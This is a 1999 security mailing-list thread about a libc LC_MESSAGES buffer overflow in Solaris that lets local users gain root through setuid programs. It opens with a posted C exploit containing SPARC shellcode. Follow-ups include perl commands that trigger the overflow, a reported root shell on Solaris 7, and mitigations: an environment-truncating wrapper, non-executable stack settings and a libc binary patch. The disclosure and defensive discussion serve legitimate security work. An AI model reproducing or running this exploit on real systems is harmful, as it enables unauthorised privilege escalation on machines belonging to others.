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Sat, 22 May 1999 03:47:02 +09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"UNYUN@ShadowPenguinSecurity" &lt;unyun@MAIL.GOO.NE.J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bc overflows when that handles LC_MESS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, If you set the long string to LC_MESSAGES and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bin/sh, the core file is dum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serious prob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ong string that contains the exploit code is se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C_MESSAGES and called suid program by execl(), local u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get the root privilege. The called suid program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to contain the overflow bu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onfirmed this bug on Solaris2.6 and Solaris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aris2.4, 2.5 does not contain this b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program is an example to get root privile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ested on Solaris2.6 for Sparc e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gram calls "/bin/passwd", but you can also specif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 suid programs such as "/bin/su" or "/bin/rsh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*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x_lobc.c Overflow Exploits( for Sparc Edi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he Shadow Penguin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(http://base.oc.to:/skyscraper/byte/55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Written by UNYUN (unewn4th@usa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EV          "LC_MESSAGES=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ADJUST     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OFFSET      53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STARTADR    4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NOP         0xa61cc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RETS        6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    x[80000]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 exploit_code[] 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2d\x0b\xd8\x9a\xac\x15\xa1\x6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2b\x0b\xda\xdc\xae\x15\x63\x68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90\x0b\x80\x0e\x92\x03\xa0\x0c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94\x10\x20\x10\x94\x22\xa0\x1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9c\x03\xa0\x14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ec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc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82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01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\x91\xd0\x20\x08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signed long get_sp(voi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asm__("mov %sp,%i0 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 i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signed int ret_ad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(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utenv("LANG=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mset(x,'x',7000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(i = 0; i &lt; ADJUST; i++) x[i]=0x4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(i = ADJUST; i &lt; 1000; i+=4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3]=NOP &amp; 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2]=(NOP &gt;&gt; 8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1]=(NOP &gt;&gt; 16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0]=(NOP &gt;&gt; 24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(i=0;i&lt;strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i]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t_adr=get_sp()-OFFSE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intf("jumping address : %lx\n",ret_adr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f ((ret_adr &amp; 0xff) ==0 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t_adr -=16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f("New jumping address : %lx\n",ret_adr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(i = ADJUST+RETS; i &lt; RETS+600; i+=4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3]=ret_adr &amp; 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2]=(ret_adr &gt;&gt; 8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1]=(ret_adr &gt;&gt; 16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x[i+0]=(ret_adr &gt;&gt; 24 ) &amp;0xff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mcpy(x,EV,strlen(EV)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x[3000]=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utenv(x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ecl("/bin/passwd","passwd",(char *)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adow Penguin Security : http://base.oc.to/skyscraper/byte/5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master : UNYUN (unewn4th@usa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Sat, 22 May 1999 17:26:47 +0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Oystein Viggen &lt;oysteivi@TIHLDE.ORG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Sat, 22 May 1999, UNYUN@ShadowPenguinSecurity wr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Hel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libc overflows when that handles LC_MESS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So, If you set the long string to LC_MESSAGES and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/bin/sh, the core file is dum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This is serious prob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The long string that contains the exploit code is se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LC_MESSAGES and called suid program by execl(), local u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can get the root privilege. The called suid program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not to contain the overflow bu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I confirmed this bug on Solaris2.6 and Solaris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Solaris2.4, 2.5 does not contain this b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n't work on my Solaris2.6/sparc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just said "Illegal instruction" when using /bin/passwd and segfaul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using /bin/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yste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 only way of discovering the limits of the poss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o venture a little way past them into the impossibl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rthur C. Clar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Sun, 23 May 1999 15:43:54 +0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M.C.Mar &lt;woloszyn@it.pl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ly-To: M.C.Mar &lt;emsi@it.pl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Sat, 22 May 1999, UNYUN@ShadowPenguinSecurity wr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Hel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libc overflows when that handles LC_MESS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So, If you set the long string to LC_MESSAGES and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/bin/sh, the core file is dum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This is serious prob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 setenv LC_MESSAGES `perl -e 'print "A"x1024'`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 /bin/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n't set locale correc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 uname -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OS XXXXXX 5.6 Generic_105181-07 sun4u sparc SUNW,Ultra-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The long string that contains the exploit code is se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LC_MESSAGES and called suid program by execl(), local u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can get the root privilege. The called suid program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not to contain the overflow bu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I confirmed this bug on Solaris2.6 and Solaris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Solaris2.4, 2.5 does not contain this b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I need to call it directly by execl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The following program is an example to get root privile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This is tested on Solaris2.6 for Sparc e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This program calls "/bin/passwd", but you can also specif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other  suid programs such as "/bin/su" or "/bin/rsh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 tracero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ror: Abort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xcessive environment variable lengt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LC_MESSAGES=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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ms like universal wrapper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details? Did I missed someth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.C.Mar   An NT server can be run by an idiot, and usually is.   emsi@it.p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If you can't make it good, make it LOOK good." - Bill G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hose who do not understand Unix are condemned to reinvent it, poor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- Henry Spencer, University of Toronto Unix h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Sun, 23 May 1999 19:06:28 +0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GOMBAS Gabor &lt;gombasg@VALERIE.INF.ELTE.HU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l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xploit works for Solaris2.6/sun4u. With Solaris7/sun4m, it g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llegal instruction". Maybe your exploit is using Ultrasparc-specif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ruction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b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bor Gombas                                       Eotvos Lorand Univers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gombasg@inf.elte.hu                        Hung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Mon, 24 May 1999 02:15:27 +09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"UNYUN@ShadowPenguinSecurity" &lt;unyun@MAIL.GOO.NE.JP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[ The following text is in the "iso-2022-jp" character set.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[ Your display is set for the "US-ASCII" character set.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[ Some characters may be displayed incorrectly.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$ setenv LC_MESSAGES `perl -e 'print "A"x1024'`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to set more long string to LC_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are using /bin/sh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% /bin/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 LC_MESSAGES=`perl -e 'print "A"x5000'`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 er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adow Penguin Security : http://base.oc.to/skyscraper/byte/5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master : UNYUN (unewn4th@usa.n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Sun, 23 May 1999 14:00:52 -0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Craig Johnston &lt;caj@LFN.ORG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Sat, 22 May 1999, Oystein Viggen wr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On Sat, 22 May 1999, UNYUN@ShadowPenguinSecurity wr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&gt; libc overflows when that handles LC_MESS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&gt; So, If you set the long string to LC_MESSAGES and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&gt; /bin/sh, the core file is dum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&gt; This is serious prob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Didn't work on my Solaris2.6/sparc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It just said "Illegal instruction" when using /bin/passwd and segfaul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when using /bin/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guess is that this is architecture-dependent.  It works on my sun4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xes and not the ultrasparcs.  It looks like it could be made to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some tweaking if you can get a SIGILL.  I'd assume the scri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dies have one that works on your platfo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 really bad one.  Here's my ugly temporary fix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a directory, /subin, and move all setuid root binaries into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ve the setuid bits.  Compile the following c program and pu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place of the old setuid root binaries, with the setuid bit s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pent a small amount of time on this, so it itself may be exploit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with ca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 cut here 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stdio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MAX_ENV 2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HOLDING_PEN "/subin/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define BSIZE 10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quick and dirty wrapper to defeat overflowing of librarie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nvironment variab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/99, Craig Johnston, caj@lfn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his comes with no guarantees except "it seems to work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When is security going to become a priority at Su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 main(int argc, char **argv, char **env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ar *p, *q, buf[BSIZE]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  i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ile (*envp) {         /* whack off long env variables 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 (p = *envp, i = 0; *p ; ++p, ++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f (i &gt;= MAX_ENV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*p = '\0'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reak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++env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(p = q = argv[0]; *p; ++p)  /* get basename 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 (*p == '/'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q = p + 1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nprintf(buf, BSIZE, "%s%s", HOLDING_PEN, q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ecve(buf, argv, envp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intf("exec() failed, bailing!\n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it(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 cut here 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aig Johns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j@lfn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Sun, 23 May 1999 20:09:05 -07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Cliff &lt;cliffo@U.WASHINGTON.EDU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s nicely on Solaris7 / sun4u using acpizer's modified source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sets liste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here:~/temp/crack$ ./a.out 71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mping address : ffbedf10,  offset = 71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uname -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OS nowhere 5.7 Generic sun4u sparc sun4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ls -al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wx------  17 root     root        1536 May 23 00:18 r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cd /r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pw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r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Mon, 24 May 1999 11:28:03 -07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Aleph One &lt;aleph1@UNDERGROUND.ORG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veral people have posted stating that turning off executing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ck solves the problem. Folks, just because it stops this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es not mean it stops all exploits. Clever ones will work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ack execution iss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ny case some protection is better than none. So to turn off execu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stack in Solaris 2.6 and 7 add the following lines to /etc/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estart the syste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urn off executable stacks (doesn't work on Solaris x8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noexec_user_stack =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noexec_user_stack_log =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ph One / aleph1@underground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underground.org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yID 1024/948FD6B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gerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 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Mon, 24 May 1999 22:29:49 +0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Casper Dik &lt;casper@HOLLAND.SUN.CO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Several people have posted stating that turning off executing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stack solves the problem. Folks, just because it stops this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does not mean it stops all exploits. Clever ones will work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the stack execution iss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In any case some protection is better than none. So to turn off execu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on the stack in Solaris 2.6 and 7 add the following lines to /etc/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and restart the syste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* Turn off executable stacks (doesn't work on Solaris x8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set noexec_user_stack =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set noexec_user_stack_log =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don't scare easily, you may try hacking libc with ad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NOT A SUN SUPPORTED SOLUTION; USE AT YOUR OWN RI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SYSTEM MAY BE RENDEDERED INOPERABLE BY FOLLOWING THE INSTRUC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100% guarantee either, it seems to work around the prob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 SPARC only solution; perhaps someone can come up with simi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e for IA3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 we start to alter the system C library with libc make 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SUNWsutl install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 pkginfo SUNWsutl; ls -l /usr/sbin/sta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ystem      SUNWsutl       Static Ut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tal 42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r-xr-xr-x   3 root     bin       213908 Mar 17 22:56 c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r-xr-xr-x   3 root     bin       213908 Mar 17 22:56 l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r-xr-xr-x   3 root     bin       213908 Mar 17 22:56 m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r-sr-xr-x   1 root     bin       712652 Mar 17 22:58 rc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r-xr-xr-x   1 root     bin       762108 Mar 17 23:00 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quick examination, there appear to be two functions that overflow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ff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_real_setloc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oad_all_loca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You're advised to use a different working copy of libc and only re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bc carefully when you've tested the resutl using LD_LIBRARY_PA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b -w /lib/libc.so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,100?a^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ot of outpu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find for other library calls in quick quick succession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90:          cmp     %i0, 0x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94:          bne,a   _real_setlocale+0x3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98:          ld      [%i2 + 0x9b0]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9c:          add     %fp, -0x6b8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a0:          call    _PROCEDURE_LINKAGE_TABLE_+0x2b8 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a4:          ld      [%i2 + 0x9cc], %o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a8:          add     %fp, -0x6b8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ac:          call    _PROCEDURE_LINKAGE_TABLE_+0x660 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b0:          mov     %l0, %o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b4:          add     %fp, -0x6b8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b8:          call    _PROCEDURE_LINKAGE_TABLE_+0x660 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bc:          ld      [%i2 + 0x9d0], %o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c0:          add     %fp, -0x6b8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c4:          call    _PROCEDURE_LINKAGE_TABLE_+0x264 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c8:          add     %fp, -0x750, %o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cc:          orcc    %g0, %o0, %g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 the second call to a nop (a 1 with six 0s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ac?W1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for nop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ac?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ac:          n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ilar for load_all_local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2c:         st      %o0, [%l0 + 0x4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30:         ld      [%fp - 0x4c]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34:         cmp     %l2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38:         bne     load_all_locales+0x3e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3c:         add     %fp, -0x464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40:         call    _PROCEDURE_LINKAGE_TABLE_+0x2b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44:         ld      [%i4 + 0x9d4], %o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48:         add     %fp, -0x464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4c:         call    _PROCEDURE_LINKAGE_TABLE_+0x6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50:         ld      [%fp - 0x4], %o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54:         add     %fp, -0x464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58:         call    _PROCEDURE_LINKAGE_TABLE_+0x6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5c:         ld      [%i4 + 0x9d8], %o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60:         add     %fp, -0x464, %o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64:         call    _PROCEDURE_LINKAGE_TABLE_+0x2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68:         add     %fp, -0x500, %o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6c:         orcc    %g0, %o0, %g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70:         bne     load_all_locales+0x3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p the second cal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4c?W1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4c:         0x40011520      =       0x100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?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_all_locales+0x34c:         n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ddresses apply to Solaris 7/SPARC (unpatched), 32 bit lib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test Solaris 2.6/SPARC libc patch differs only a little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real_setlocale+0x2b8, load_all_locales+0x34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sure to test the library before installing it and verify the addre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rding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afely replace a library, do thi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p modifiedlibc.so.1 /usr/lib/libc.so.1.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d /usr/li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n libc.so.1 libc.so.1.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n libc.so.1.new libc.so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sure to remove libc.so.1.old or place it outside usr/lib as the run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ker can accept it as LD_PRELOAD in which case you'd be back at sq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Tue, 25 May 1999 15:13:17 -04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Doug Granzow &lt;dgranzow@DIGEX.NE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From the testing I've done, the original exploit posted by UNYUN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s on unpatched 2.6 systems, but acpizer's modification, which a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to specify an offset, works on any 2.6 or 2.7 system if you u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 offset.  I found that using an offset of (I believe) 7144 works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 system with patch 105210-19 insta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ue, 25 May 1999, Wyman Eric Miles wr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Correct me if I'm wrong, but doesn't 105210-06 or higher address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under 2.6?  I've been unable to get the exploit to work on any pat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system, though it works nicely on any architecture I've tried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doesn't have the pa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Wy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Tue, 25 May 1999 20:57:00 +0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Dust &lt;dust@CANNONBALL.DYNDNS.ORG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ue, May 25, 1999 at 09:30:53AM -0500, Wyman Eric Miles wr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Correct me if I'm wrong, but doesn't 105210-06 or higher address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under 2.6?  I've been unable to get the exploit to work on any pat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system, though it works nicely on any architecture I've tried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doesn't have the pa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rding 105210 descrip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105210-0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18295 LC_* can be used to obtain root access from setuid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ve tried to find the referenced bug description, but I wasn't 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d it on the Sunsolve K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ct is the ability to tell a man he has an open mind when he h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e in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Tue, 25 May 1999 15:21:20 -04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Toby Chappell &lt;sysatc@EVOKEN.GSU.EDU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an Eric Miles wro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Correct me if I'm wrong, but doesn't 105210-06 or higher address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under 2.6?  I've been unable to get the exploit to work on any pat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system, though it works nicely on any architecture I've tried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doesn't have the pa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 got it to work using the second version of the exploit (the one that l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pecify offsets) on a 2.6 box with 105210-10 installed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by Chappell                                        Georgia State Uni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s Programmer IV                                   Atlanta, Georg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chappell@gsu.edu                                         (404) 651-26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Tue, 25 May 1999 22:37:06 +0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Karsten Thygesen &lt;karthy@KOM.AUC.DK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&gt;&gt;&gt; "Wyman" == Wyman Eric Miles &lt;wymanm@IS.RICE.EDU&gt; writ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an&gt; Correct me if I'm wrong, but doesn't 105210-06 or hig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an&gt; address this under 2.6?  I've been unable to get the exploi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an&gt; work on any patched system, though it works nicely on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an&gt; architecture I've tried which doesn't have the pa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- at least is Solaris-2.6 (E3500) vulnerable with 105210-19 insta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s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.Sc.E.E, Sys/Net-administrator, BOFH, Aalborg University, Denm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kom.auc.dk/~karthy/ for more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SITE Denmark Manager (http://sunsite.auc.dk/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$Id: .signature,v 1.1 1997/06/18 08:30:00 karthy Exp $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Wed, 26 May 1999 12:20:03 +0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Peter Harvey Solaris Sustaining Engineering &lt;peter.harvey@UK.Sun.CO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4118295 LC_* can be used to obtain root access from setuid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lready fixed in Solaris 7 and the following patch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aris 2.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ELEASE     ARCH  P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.6         i386  105211-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.6         sparc 105210-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xploit referred to in this thread is in the same area (local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vironment variables) but is differ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I've tried to find the referenced bug description, but I wasn't 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find it on the Sunsolve K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tend to be cautious about publishing our security bu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 P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staining Engineer, Solaris Software, Sun Micro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r.harvey@uk.sun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Wed, 26 May 1999 21:10:56 +0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Peter Harvey Solaris Sustaining Engineering &lt;peter.harvey@UK.Sun.CO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BUGTRAQ@netspace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Re: Solaris libc exploit  Re: Solaris libc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k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use my not being clear enough here. A few people have already as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about this (to whom I replied individually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 So 105210 doesn't fix the prob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tch I referred to does not fix the current exploit (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). I think perhaps you misunderstood my email. The bug 4118295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red to is already fixed in the patch as I described.  This cur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it is n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emailed BUGTRAQ to confir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a) bug 4118295 is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b) bug 4118295 is already fix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c) this exploit is new (and therefore *not* 411829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 P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